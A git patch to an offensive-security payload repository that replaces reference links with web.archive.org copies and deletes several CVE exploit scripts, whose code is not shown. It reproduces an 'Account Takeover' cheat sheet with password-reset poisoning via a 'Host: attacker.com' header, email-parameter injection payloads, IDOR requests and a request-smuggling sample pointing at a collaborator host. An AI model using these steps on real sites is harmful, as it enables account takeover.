From 497fbe925b127d6e396ff55fe8f34c8b9366555f Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Mon, 9 Mar 2026 13:02:28 +0100
Subject: [PATCH] Archive external reference links via Wayback Machine

Replace direct URLs in Markdown references with their
web.archive.org equivalents to prevent link rot.
---
 API Key Leaks/IIS-Machine-Keys.md             |  10 +-
 API Key Leaks/README.md                       |   6 +-
 Account Takeover/README.md                    | 374 ++++++-------
 Brute Force Rate Limit/README.md              |   8 +-
 Business Logic Errors/README.md               |   8 +-
 CORS Misconfiguration/README.md               |  20 +-
 CRLF Injection/README.md                      |   2 +-
 CSS Injection/README.md                       |  24 +-
 CSV Injection/README.md                       |  14 +-
 ...2013-2251 CVE-2017-5638 CVE-2018-11776_.py | 215 --------
 CVE Exploits/Apache Struts 2 CVE-2017-9805.py | 326 -----------
 .../Apache Struts 2 CVE-2018-11776.py         | 231 --------
 CVE Exploits/Citrix CVE-2019-19781.py         |  51 --
 CVE Exploits/Docker API RCE.py                |  49 --
 CVE Exploits/Drupalgeddon2 CVE-2018-7600.rb   | 308 -----------
 CVE Exploits/Heartbleed CVE-2014-0160.py      | 216 --------
 CVE Exploits/JBoss CVE-2015-7501.py           |  62 ---
 CVE Exploits/Jenkins CVE-2015-8103.py         |  88 ---
 CVE Exploits/Jenkins CVE-2016-0792.py         |  84 ---
 CVE Exploits/Jenkins Groovy Console.py        |  32 --
 CVE Exploits/Log4Shell.md                     | 214 ++++----
 CVE Exploits/README.md                        |  12 +-
 CVE Exploits/Rails CVE-2019-5420.rb           | 156 ------
 CVE Exploits/Shellshock CVE-2014-6271.py      |  36 --
 CVE Exploits/Telerik CVE-2017-9248.py         | 362 -------------
 CVE Exploits/Telerik CVE-2019-18935.py        | 140 -----
 CVE Exploits/Tomcat CVE-2017-12617.py         | 239 ---------
 CVE Exploits/WebLogic CVE-2016-3510.py        |  72 ---
 CVE Exploits/WebLogic CVE-2017-10271.py       |  63 ---
 CVE Exploits/WebLogic CVE-2018-2894.py        | 128 -----
 CVE Exploits/WebSphere CVE-2015-7450.py       |  80 ---
 CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh   |   1 -
 Clickjacking/README.md                        |   8 +-
 Client Side Path Traversal/README.md          |  18 +-
 Command Injection/README.md                   |  16 +-
 Cross-Site Request Forgery/README.md          |  22 +-
 DOM Clobbering/README.md                      |  10 +-
 Denial of Service/README.md                   |   4 +-
 Dependency Confusion/README.md                |  78 +--
 Directory Traversal/README.md                 |  10 +-
 Encoding Transformations/README.md            |  10 +-
 External Variable Modification/README.md      |  10 +-
 File Inclusion/LFI-to-RCE.md                  |  10 +-
 File Inclusion/README.md                      |  10 +-
 File Inclusion/Wrappers.md                    |   6 +-
 Google Web Toolkit/README.md                  |   4 +-
 GraphQL Injection/README.md                   |  34 +-
 HTTP Parameter Pollution/README.md            |   6 +-
 Headless Browser/README.md                    |  18 +-
 Hidden Parameters/README.md                   |   2 +-
 Insecure Deserialization/DotNET.md            |  26 +-
 Insecure Deserialization/Java.md              |  28 +-
 Insecure Deserialization/Node.md              |   6 +-
 Insecure Deserialization/PHP.md               |  24 +-
 Insecure Deserialization/Python.md            |  10 +-
 Insecure Deserialization/README.md            |   6 +-
 Insecure Deserialization/Ruby.md              |  10 +-
 Insecure Direct Object References/README.md   |  18 +-
 Insecure Management Interface/README.md       |   6 +-
 Insecure Randomness/README.md                 |  14 +-
 Insecure Source Code Management/Bazaar.md     |   2 +-
 Insecure Source Code Management/Git.md        |   2 +-
 Insecure Source Code Management/Mercurial.md  |   2 +-
 Insecure Source Code Management/Subversion.md |   2 +-
 JSON Web Token/README.md                      |  28 +-
 Java RMI/README.md                            |   6 +-
 LDAP Injection/README.md                      |  12 +-
 LaTeX Injection/README.md                     |   6 +-
 Mass Assignment/README.md                     |   2 +-
 NoSQL Injection/README.md                     |  12 +-
 OAuth Misconfiguration/README.md              |  10 +-
 ORM Leak/README.md                            |  14 +-
 Open Redirect/README.md                       |   8 +-
 Prompt Injection/README.md                    |  18 +-
 Prototype Pollution/README.md                 |  24 +-
 Race Condition/README.md                      | 330 ++++++------
 Regular Expression/README.md                  |  10 +-
 Request Smuggling/README.md                   | 362 ++++++-------
 Reverse Proxy Misconfigurations/README.md     |   4 +-
 SAML Injection/README.md                      |  20 +-
 SQL Injection/BigQuery Injection.md           | 128 ++---
 SQL Injection/Cassandra Injection.md          |   4 +-
 SQL Injection/DB2 Injection.md                | 268 +++++-----
 SQL Injection/MSSQL Injection.md              |  14 +-
 SQL Injection/MySQL Injection.md              |  16 +-
 SQL Injection/OracleSQL Injection.md          |   8 +-
 SQL Injection/PostgreSQL Injection.md         |  14 +-
 SQL Injection/README.md                       |  22 +-
 SQL Injection/SQLite Injection.md             |   4 +-
 SQL Injection/SQLmap.md                       |   4 +-
 Server Side Include Injection/README.md       |  12 +-
 Server Side Request Forgery/README.md         |  40 +-
 .../SSRF-Advanced-Exploitation.md             |   4 +-
 .../SSRF-Cloud-Instances.md                   |   2 +-
 Server Side Template Injection/ASP.md         |   2 +-
 Server Side Template Injection/Java.md        |  22 +-
 Server Side Template Injection/JavaScript.md  |   2 +-
 Server Side Template Injection/PHP.md         |   2 +-
 Server Side Template Injection/Python.md      |  10 +-
 Server Side Template Injection/README.md      |  14 +-
 Tabnabbing/README.md                          |   4 +-
 Type Juggling/README.md                       |   4 +-
 .../Configuration Apache .htaccess/README.md  |   6 +-
 Upload Insecure Files/README.md               |  32 +-
 Virtual Hosts/README.md                       |   4 +-
 Web Cache Deception/README.md                 |  22 +-
 Web Sockets/README.md                         |  10 +-
 XPATH Injection/README.md                     |   4 +-
 XS-Leak/README.md                             |  12 +-
 XSLT Injection/README.md                      | 504 +++++++++---------
 XSS Injection/1 - XSS Filter Bypass.md        |   2 +-
 XSS Injection/2 - XSS Polyglot.md             |   2 +-
 XSS Injection/4 - CSP Bypass.md               |   6 +-
 XSS Injection/5 - XSS in Angular.md           |   6 +-
 XSS Injection/README.md                       |  68 +--
 XXE Injection/README.md                       |  50 +-
 Zip Slip/README.md                            |   2 +-
 _template_vuln/README.md                      |   2 +-
 118 files changed, 1661 insertions(+), 4600 deletions(-)
 delete mode 100644 CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
 delete mode 100644 CVE Exploits/Apache Struts 2 CVE-2017-9805.py
 delete mode 100644 CVE Exploits/Apache Struts 2 CVE-2018-11776.py
 delete mode 100644 CVE Exploits/Citrix CVE-2019-19781.py
 delete mode 100644 CVE Exploits/Docker API RCE.py
 delete mode 100644 CVE Exploits/Drupalgeddon2 CVE-2018-7600.rb
 delete mode 100644 CVE Exploits/Heartbleed CVE-2014-0160.py
 delete mode 100644 CVE Exploits/JBoss CVE-2015-7501.py
 delete mode 100644 CVE Exploits/Jenkins CVE-2015-8103.py
 delete mode 100644 CVE Exploits/Jenkins CVE-2016-0792.py
 delete mode 100644 CVE Exploits/Jenkins Groovy Console.py
 delete mode 100644 CVE Exploits/Rails CVE-2019-5420.rb
 delete mode 100644 CVE Exploits/Shellshock CVE-2014-6271.py
 delete mode 100644 CVE Exploits/Telerik CVE-2017-9248.py
 delete mode 100644 CVE Exploits/Telerik CVE-2019-18935.py
 delete mode 100644 CVE Exploits/Tomcat CVE-2017-12617.py
 delete mode 100644 CVE Exploits/WebLogic CVE-2016-3510.py
 delete mode 100644 CVE Exploits/WebLogic CVE-2017-10271.py
 delete mode 100644 CVE Exploits/WebLogic CVE-2018-2894.py
 delete mode 100644 CVE Exploits/WebSphere CVE-2015-7450.py
 delete mode 100644 CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh

diff --git a/API Key Leaks/IIS-Machine-Keys.md b/API Key Leaks/IIS-Machine-Keys.md
index 22fcdda..8210e85 100644
--- a/API Key Leaks/IIS-Machine-Keys.md	
+++ b/API Key Leaks/IIS-Machine-Keys.md	
@@ -200,8 +200,8 @@ $ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
 
 ## References
 
-* [Deep Dive into .NET ViewState Deserialization and Its Exploitation - Swapneil Kumar Dash - October 22, 2019](https://swapneildash.medium.com/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)
-* [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili - April 23, 2019](https://soroush.me/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
-* [Exploiting ViewState Deserialization using Blacklist3r and YSoSerial.Net - Claranet - June 13, 2019](https://www.claranet.com/us/blog/2019-06-13-exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserialnet)
-* [Project Blacklist3r - @notsosecure - November 23, 2018](https://www.notsosecure.com/project-blacklist3r/)
-* [View State, The Unpatchable IIS Forever Day Being Actively Exploited - Zeroed - July 21, 2024](https://zeroed.tech/blog/viewstate-the-unpatchable-iis-forever-day-being-actively-exploited/)
+* [Deep Dive into .NET ViewState Deserialization and Its Exploitation - Swapneil Kumar Dash - October 22, 2019](https://web.archive.org/web/20250916225422/https://swapneildash.medium.com/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)
+* [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili - April 23, 2019](https://web.archive.org/web/20250806010506/https://soroush.me/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
+* [Exploiting ViewState Deserialization using Blacklist3r and YSoSerial.Net - Claranet - June 13, 2019](https://web.archive.org/web/20250810191756/https://www.claranet.com/us/blog/2019-06-13-exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserialnet)
+* [Project Blacklist3r - @notsosecure - November 23, 2018](https://web.archive.org/web/20260116051627/https://notsosecure.com/project-blacklist3r)
+* [View State, The Unpatchable IIS Forever Day Being Actively Exploited - Zeroed - July 21, 2024](https://web.archive.org/web/20260107194152/https://zeroed.tech/blog/viewstate-the-unpatchable-iis-forever-day-being-actively-exploited/)
diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md
index b14e563..bdc1ccd 100644
--- a/API Key Leaks/README.md	
+++ b/API Key Leaks/README.md	
@@ -103,6 +103,6 @@ Add these lines to your `.pre-commit-config.yaml` file.
 ## References
 
 - [Finding Hidden API Keys & How to Use Them - Sumit Jain - August 24, 2019](https://web.archive.org/web/20191012175520/https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d)
-- [Introducing SignSaboteur: Forge Signed Web Tokens with Ease - Zakhar Fedotkin - May 22, 2024](https://portswigger.net/research/introducing-signsaboteur-forge-signed-web-tokens-with-ease)
-- [Private API Key Leakage Due to Lack of Access Control - yox - August 8, 2018](https://hackerone.com/reports/376060)
-- [Saying Goodbye to My Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020](https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/)
+- [Introducing SignSaboteur: Forge Signed Web Tokens with Ease - Zakhar Fedotkin - May 22, 2024](https://web.archive.org/web/20240522172244/https://portswigger.net/research/introducing-signsaboteur-forge-signed-web-tokens-with-ease)
+- [Private API Key Leakage Due to Lack of Access Control - yox - August 8, 2018](https://web.archive.org/web/20211208043535/https://hackerone.com/reports/376060)
+- [Saying Goodbye to My Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020](https://web.archive.org/web/20250714230057/https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/)
diff --git a/Account Takeover/README.md b/Account Takeover/README.md
index 0aa4220..bc4810b 100644
--- a/Account Takeover/README.md	
+++ b/Account Takeover/README.md	
@@ -1,187 +1,187 @@
-# Account Takeover
-
-> Account Takeover (ATO) is a significant threat in the cybersecurity landscape, involving unauthorized access to users' accounts through various attack vectors.
-
-## Summary
-
-* [Password Reset Feature](#password-reset-feature)
-    * [Password Reset Token Leak via Referrer](#password-reset-token-leak-via-referrer)
-    * [Account Takeover Through Password Reset Poisoning](#account-takeover-through-password-reset-poisoning)
-    * [Password Reset via Email Parameter](#password-reset-via-email-parameter)
-    * [IDOR on API Parameters](#idor-on-api-parameters)
-    * [Weak Password Reset Token](#weak-password-reset-token)
-    * [Leaking Password Reset Token](#leaking-password-reset-token)
-    * [Password Reset via Username Collision](#password-reset-via-username-collision)
-    * [Account Takeover Due To Unicode Normalization Issue](#account-takeover-due-to-unicode-normalization-issue)
-* [Account Takeover via Web Vulnerabilities](#account-takeover-via-web-vulnerabilities)
-    * [Account Takeover via Cross Site Scripting](#account-takeover-via-cross-site-scripting)
-    * [Account Takeover via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling)
-    * [Account Takeover via CSRF](#account-takeover-via-csrf)
-* [References](#references)
-
-## Password Reset Feature
-
-### Password Reset Token Leak via Referrer
-
-1. Request password reset to your email address
-2. Click on the password reset link
-3. Don't change password
-4. Click any 3rd party websites(eg: Facebook, twitter)
-5. Intercept the request in Burp Suite proxy
-6. Check if the referer header is leaking password reset token.
-
-### Account Takeover Through Password Reset Poisoning
-
-1. Intercept the password reset request in Burp Suite
-2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
-3. Forward the request with the modified header
-
-    ```http
-    POST https://example.com/reset.php HTTP/1.1
-    Accept: */*
-    Content-Type: application/json
-    Host: attacker.com
-    ```
-
-4. Look for a password reset URL based on the *host header* like : `https://attacker.com/reset-password.php?token=TOKEN`
-
-### Password Reset via Email Parameter
-
-```powershell
-# parameter pollution
-email=victim@mail.com&email=hacker@mail.com
-
-# array of emails
-{"email":["victim@mail.com","hacker@mail.com"]}
-
-# carbon copy
-email=victim@mail.com%0A%0Dcc:hacker@mail.com
-email=victim@mail.com%0A%0Dbcc:hacker@mail.com
-
-# separator
-email=victim@mail.com,hacker@mail.com
-email=victim@mail.com%20hacker@mail.com
-email=victim@mail.com|hacker@mail.com
-```
-
-### IDOR on API Parameters
-
-1. Attacker have to login with their account and go to the **Change password** feature.
-2. Start the Burp Suite and Intercept the request
-3. Send it to the repeater tab and edit the parameters : User ID/email
-
-    ```powershell
-    POST /api/changepass
-    [...]
-    ("form": {"email":"victim@email.com","password":"securepwd"})
-    ```
-
-### Weak Password Reset Token
-
-The password reset token should be randomly generated and unique every time.
-Try to determine if the token expire or if it's always the same, in some cases the generation algorithm is weak and can be guessed. The following variables might be used by the algorithm.
-
-* Timestamp
-* UserID
-* Email of User
-* Firstname and Lastname
-* Date of Birth
-* Cryptography
-* Number only
-* Small token sequence (<6 characters between [A-Z,a-z,0-9])
-* Token reuse
-* Token expiration date
-
-### Leaking Password Reset Token
-
-1. Trigger a password reset request using the API/UI for a specific email e.g: <test@mail.com>
-2. Inspect the server response and check for `resetToken`
-3. Then use the token in an URL like `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
-
-### Password Reset via Username Collision
-
-1. Register on the system with a username identical to the victim's username, but with white spaces inserted before and/or after the username. e.g: `"admin "`
-2. Request a password reset with your malicious username.
-3. Use the token sent to your email and reset the victim password.
-4. Connect to the victim account with the new password.
-
-The platform CTFd was vulnerable to this attack.
-See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
-
-### Account Takeover Due To Unicode Normalization Issue
-
-When processing user input involving unicode for case mapping or normalisation, unexpected behavior can occur.  
-
-* Victim account: `demo@gmail.com`
-* Attacker account: `demⓞ@gmail.com`
-
-[Unisub - is a tool that can suggest potential unicode characters that may be converted to a given character](https://github.com/tomnomnom/hacks/tree/master/unisub).
-
-[Unicode pentester cheatsheet](https://gosecure.github.io/unicode-pentester-cheatsheet/) can be used to find list of suitable unicode characters based on platform.
-
-## Account Takeover via Web Vulnerabilities
-
-### Account Takeover via Cross Site Scripting
-
-1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : `*.domain.com`
-2. Leak the current **sessions cookie**
-3. Authenticate as the user using the cookie
-
-### Account Takeover via HTTP Request Smuggling
-
-Refer to **HTTP Request Smuggling** vulnerability page.
-
-1. Use **smuggler** to detect the type of HTTP Request Smuggling (CL, TE, CL.TE)
-
-    ```powershell
-    git clone https://github.com/defparam/smuggler.git
-    cd smuggler
-    python3 smuggler.py -h
-    ```
-
-2. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data:
-
-    ```powershell
-    GET http://something.burpcollaborator.net  HTTP/1.1
-    X: 
-    ```
-
-3. Final request could look like the following
-
-    ```powershell
-    GET /  HTTP/1.1
-    Transfer-Encoding: chunked
-    Host: something.com
-    User-Agent: Smuggler/v1.0
-    Content-Length: 83
-
-    0
-
-    GET http://something.burpcollaborator.net  HTTP/1.1
-    X: X
-    ```
-
-Hackerone reports exploiting this bug
-
-* <https://hackerone.com/reports/737140>
-* <https://hackerone.com/reports/771666>
-
-### Account Takeover via CSRF
-
-1. Create a payload for the CSRF, e.g: "HTML form with auto submit for a password change"
-2. Send the payload
-
-### Account Takeover via JWT
-
-JSON Web Token might be used to authenticate an user.
-
-* Edit the JWT with another User ID / Email
-* Check for weak JWT signature
-
-## References
-
-* [$6,5k + $5k HTTP Request Smuggling mass account takeover - Slack + Zomato - Bug Bounty Reports Explained - August 30, 2020](https://www.youtube.com/watch?v=gzM4wWA7RFo)
-* [10 Password Reset Flaws - Anugrah SR - September 16, 2020](https://anugrahsr.github.io/posts/10-Password-reset-flaws/)
-* [Broken Cryptography & Account Takeovers - Harsh Bothra - September 20, 2020](https://speakerdeck.com/harshbothra/broken-cryptography-and-account-takeovers?slide=28)
-* [CTFd Account Takeover - NIST National Vulnerability Database - March 29, 2020](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
-* [Hacking Grindr Accounts with Copy and Paste - Troy Hunt - October 3, 2020](https://www.troyhunt.com/hacking-grindr-accounts-with-copy-and-paste/)
+# Account Takeover
+
+> Account Takeover (ATO) is a significant threat in the cybersecurity landscape, involving unauthorized access to users' accounts through various attack vectors.
+
+## Summary
+
+* [Password Reset Feature](#password-reset-feature)
+    * [Password Reset Token Leak via Referrer](#password-reset-token-leak-via-referrer)
+    * [Account Takeover Through Password Reset Poisoning](#account-takeover-through-password-reset-poisoning)
+    * [Password Reset via Email Parameter](#password-reset-via-email-parameter)
+    * [IDOR on API Parameters](#idor-on-api-parameters)
+    * [Weak Password Reset Token](#weak-password-reset-token)
+    * [Leaking Password Reset Token](#leaking-password-reset-token)
+    * [Password Reset via Username Collision](#password-reset-via-username-collision)
+    * [Account Takeover Due To Unicode Normalization Issue](#account-takeover-due-to-unicode-normalization-issue)
+* [Account Takeover via Web Vulnerabilities](#account-takeover-via-web-vulnerabilities)
+    * [Account Takeover via Cross Site Scripting](#account-takeover-via-cross-site-scripting)
+    * [Account Takeover via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling)
+    * [Account Takeover via CSRF](#account-takeover-via-csrf)
+* [References](#references)
+
+## Password Reset Feature
+
+### Password Reset Token Leak via Referrer
+
+1. Request password reset to your email address
+2. Click on the password reset link
+3. Don't change password
+4. Click any 3rd party websites(e.g., Facebook, twitter)
+5. Intercept the request in Burp Suite proxy
+6. Check if the referer header is leaking password reset token.
+
+### Account Takeover Through Password Reset Poisoning
+
+1. Intercept the password reset request in Burp Suite
+2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
+3. Forward the request with the modified header
+
+    ```http
+    POST https://example.com/reset.php HTTP/1.1
+    Accept: */*
+    Content-Type: application/json
+    Host: attacker.com
+    ```
+
+4. Look for a password reset URL based on the *host header* like : `https://attacker.com/reset-password.php?token=TOKEN`
+
+### Password Reset via Email Parameter
+
+```powershell
+# parameter pollution
+email=victim@mail.com&email=hacker@mail.com
+
+# array of emails
+{"email":["victim@mail.com","hacker@mail.com"]}
+
+# carbon copy
+email=victim@mail.com%0A%0Dcc:hacker@mail.com
+email=victim@mail.com%0A%0Dbcc:hacker@mail.com
+
+# separator
+email=victim@mail.com,hacker@mail.com
+email=victim@mail.com%20hacker@mail.com
+email=victim@mail.com|hacker@mail.com
+```
+
+### IDOR on API Parameters
+
+1. Attacker have to login with their account and go to the **Change password** feature.
+2. Start the Burp Suite and Intercept the request
+3. Send it to the repeater tab and edit the parameters : User ID/email
+
+    ```powershell
+    POST /api/changepass
+    [...]
+    ("form": {"email":"victim@email.com","password":"securepwd"})
+    ```
+
+### Weak Password Reset Token
+
+The password reset token should be randomly generated and unique every time.
+Try to determine if the token expire or if it's always the same, in some cases the generation algorithm is weak and can be guessed. The following variables might be used by the algorithm.
+
+* Timestamp
+* UserID
+* Email of User
+* Firstname and Lastname
+* Date of Birth
+* Cryptography
+* Number only
+* Small token sequence (<6 characters between [A-Z,a-z,0-9])
+* Token reuse
+* Token expiration date
+
+### Leaking Password Reset Token
+
+1. Trigger a password reset request using the API/UI for a specific email e.g: <test@mail.com>
+2. Inspect the server response and check for `resetToken`
+3. Then use the token in an URL like `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
+
+### Password Reset via Username Collision
+
+1. Register on the system with a username identical to the victim's username, but with white spaces inserted before and/or after the username. e.g: `"admin "`
+2. Request a password reset with your malicious username.
+3. Use the token sent to your email and reset the victim password.
+4. Connect to the victim account with the new password.
+
+The platform CTFd was vulnerable to this attack.
+See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
+
+### Account Takeover Due To Unicode Normalization Issue
+
+When processing user input involving unicode for case mapping or normalisation, unexpected behavior can occur.  
+
+* Victim account: `demo@gmail.com`
+* Attacker account: `demⓞ@gmail.com`
+
+[Unisub - is a tool that can suggest potential unicode characters that may be converted to a given character](https://github.com/tomnomnom/hacks/tree/master/unisub).
+
+[Unicode pentester cheatsheet](https://gosecure.github.io/unicode-pentester-cheatsheet/) can be used to find list of suitable unicode characters based on platform.
+
+## Account Takeover via Web Vulnerabilities
+
+### Account Takeover via Cross Site Scripting
+
+1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : `*.domain.com`
+2. Leak the current **sessions cookie**
+3. Authenticate as the user using the cookie
+
+### Account Takeover via HTTP Request Smuggling
+
+Refer to **HTTP Request Smuggling** vulnerability page.
+
+1. Use **smuggler** to detect the type of HTTP Request Smuggling (CL, TE, CL.TE)
+
+    ```powershell
+    git clone https://github.com/defparam/smuggler.git
+    cd smuggler
+    python3 smuggler.py -h
+    ```
+
+2. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data:
+
+    ```powershell
+    GET http://something.burpcollaborator.net  HTTP/1.1
+    X: 
+    ```
+
+3. Final request could look like the following
+
+    ```powershell
+    GET /  HTTP/1.1
+    Transfer-Encoding: chunked
+    Host: something.com
+    User-Agent: Smuggler/v1.0
+    Content-Length: 83
+
+    0
+
+    GET http://something.burpcollaborator.net  HTTP/1.1
+    X: X
+    ```
+
+Hackerone reports exploiting this bug
+
+* <https://hackerone.com/reports/737140>
+* <https://hackerone.com/reports/771666>
+
+### Account Takeover via CSRF
+
+1. Create a payload for the CSRF, e.g: "HTML form with auto submit for a password change"
+2. Send the payload
+
+### Account Takeover via JWT
+
+JSON Web Token might be used to authenticate an user.
+
+* Edit the JWT with another User ID / Email
+* Check for weak JWT signature
+
+## References
+
+* [$6,5k + $5k HTTP Request Smuggling mass account takeover - Slack + Zomato - Bug Bounty Reports Explained - August 30, 2020](https://web.archive.org/web/20250701123134/https://www.youtube.com/watch?v=gzM4wWA7RFo)
+* [10 Password Reset Flaws - Anugrah SR - September 16, 2020](https://web.archive.org/web/20250626114943/https://anugrahsr.github.io/posts/10-Password-reset-flaws/)
+* [Broken Cryptography & Account Takeovers - Harsh Bothra - September 20, 2020](https://web.archive.org/web/20250913121907/https://speakerdeck.com/harshbothra/broken-cryptography-and-account-takeovers?slide=28)
+* [CTFd Account Takeover - NIST National Vulnerability Database - March 29, 2020](https://web.archive.org/web/20200329075120/https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
+* [Hacking Grindr Accounts with Copy and Paste - Troy Hunt - October 3, 2020](https://web.archive.org/web/20251219192449/https://www.troyhunt.com/hacking-grindr-accounts-with-copy-and-paste/)
diff --git a/Brute Force Rate Limit/README.md b/Brute Force Rate Limit/README.md
index 93704ff..669556b 100644
--- a/Brute Force Rate Limit/README.md	
+++ b/Brute Force Rate Limit/README.md	
@@ -141,7 +141,7 @@ Many cloud providers, such as Vultr, offer /64 IPv6 ranges, which provide a vast
 
 ## References
 
-* [Bruteforcing the phone number of any Google user - brutecat - June 9, 2025](https://brutecat.com/articles/leaking-google-phones)
-* [Burp Intruder attack types - PortSwigger - August 19, 2025](https://portswigger.net/burp/documentation/desktop/tools/intruder/configure-attack/attack-types)
-* [Detecting and annoying Burp users - Julien Voisin -  May 3, 2021](https://dustri.org/b/detecting-and-annoying-burp-users.html)
-* [OmniProx: Multi-Cloud IP Rotation Made Simple - Andy Gill - September 28, 2025](https://blog.zsec.uk/omniprox/)
+* [Bruteforcing the phone number of any Google user - brutecat - June 9, 2025](https://web.archive.org/web/20250609141236/https://brutecat.com/articles/leaking-google-phones)
+* [Burp Intruder attack types - PortSwigger - August 19, 2025](https://web.archive.org/web/20260124024947/https://portswigger.net/burp/documentation/desktop/tools/intruder/configure-attack/attack-types)
+* [Detecting and annoying Burp users - Julien Voisin -  May 3, 2021](https://web.archive.org/web/20260102160139/https://dustri.org/b/detecting-and-annoying-burp-users.html)
+* [OmniProx: Multi-Cloud IP Rotation Made Simple - Andy Gill - September 28, 2025](https://web.archive.org/web/20260215082718/https://blog.zsec.uk/omniprox/)
diff --git a/Business Logic Errors/README.md b/Business Logic Errors/README.md
index a3f0a58..b7df79d 100644
--- a/Business Logic Errors/README.md	
+++ b/Business Logic Errors/README.md	
@@ -89,7 +89,7 @@ In this example, instead of rounding and rejecting or enforcing a minimum transf
 
 ## References
 
-* [Business Logic Vulnerabilities - PortSwigger - 2024](https://portswigger.net/web-security/logic-flaws)
-* [Business Logic Vulnerability - OWASP - 2024](https://owasp.org/www-community/vulnerabilities/Business_logic_vulnerability)
-* [CWE-840: Business Logic Errors - CWE - March 24, 2011](https://cwe.mitre.org/data/definitions/840.html)
-* [Examples of Business Logic Vulnerabilities - PortSwigger - 2024](https://portswigger.net/web-security/logic-flaws/examples)
+* [Business Logic Vulnerabilities - PortSwigger - 2024](https://web.archive.org/web/20260305155804/https://portswigger.net/web-security/logic-flaws)
+* [Business Logic Vulnerability - OWASP - 2024](https://web.archive.org/web/20200422002600/https://owasp.org/www-community/vulnerabilities/Business_logic_vulnerability)
+* [CWE-840: Business Logic Errors - CWE - March 24, 2011](https://web.archive.org/web/20260304013031/https://cwe.mitre.org/data/definitions/840.html)
+* [Examples of Business Logic Vulnerabilities - PortSwigger - 2024](https://web.archive.org/web/20200922175829/https://portswigger.net/web-security/logic-flaws/examples)
diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md
index 62d8761..8807254 100644
--- a/CORS Misconfiguration/README.md	
+++ b/CORS Misconfiguration/README.md	
@@ -1,6 +1,6 @@
 # CORS Misconfiguration
 
-> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials.
+> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker's site using the victim's credentials.
 
 ## Summary
 
@@ -263,12 +263,12 @@ function reqListener() {
 
 * [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7) - December 20, 2018](https://hackerone.com/reports/470298)
 * [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://web.archive.org/web/20190516052453/https://www.corben.io/advanced-cors-techniques/)
-* [CORS misconfig | Account Takeover - Rohan (nahoragg) - October 20, 2018](https://hackerone.com/reports/426147)
-* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t) - October 29, 2018](https://hackerone.com/reports/430249)
-* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax) - September 15, 2016](https://hackerone.com/reports/168574)
-* [CORS Misconfigurations Explained - Detectify Blog - April 26, 2018](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/)
-* [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://portswigger.net/web-security/cors)
-* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy) - June 1, 2017](https://hackerone.com/reports/235200)
-* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
-* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - December 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
-* [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
+* [CORS misconfig | Account Takeover - Rohan (nahoragg) - October 20, 2018](https://web.archive.org/web/20250426222841/https://hackerone.com/reports/426147)
+* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t) - October 29, 2018](https://web.archive.org/web/20190820201328/https://hackerone.com/reports/430249)
+* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax) - September 15, 2016](https://web.archive.org/web/20171230084544/https://hackerone.com/reports/168574)
+* [CORS Misconfigurations Explained - Detectify Blog - April 26, 2018](https://web.archive.org/web/20230323053559/https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/)
